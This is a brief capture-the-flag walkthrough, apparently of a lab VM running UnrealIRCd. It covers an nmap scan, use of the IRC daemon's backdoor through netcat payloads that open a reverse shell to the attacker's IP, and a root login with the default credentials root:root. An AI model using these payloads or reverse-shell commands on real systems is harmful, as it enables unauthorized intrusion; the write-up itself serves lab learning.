Machine IP →
Nmap scan →
nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.56.120
OS Detection →
|Port||Service||Other details (if any)|
|6667, 6697, 8067||IRC||UnrealIRCd|
The only service is an IRC, so searched exploit db via searchsploit for an exploit. This returned 4 entries. Looking at the code for the first one, there seems to be a backdoor which allows execution of shell commands when anything start with
Therefore, access can be checked by connecting to the IRCd via netcat and sending the the payload as
AB;echo "a" | nc 192.168.49.56 3002. With a listener active on the attacking machine with the IP as in the payload, a conection and the letter “a” would be received.
Therefore, a similar payload can be used to receive shell via nc →
AB;nc 192.168.49.56 3002 -e /bin/bash. This gives a shell as the
server user. The home directory has the user flag.
With the shell of the
server user, trying default creds of
root:root works for getting the shell to root. This gives the root flag.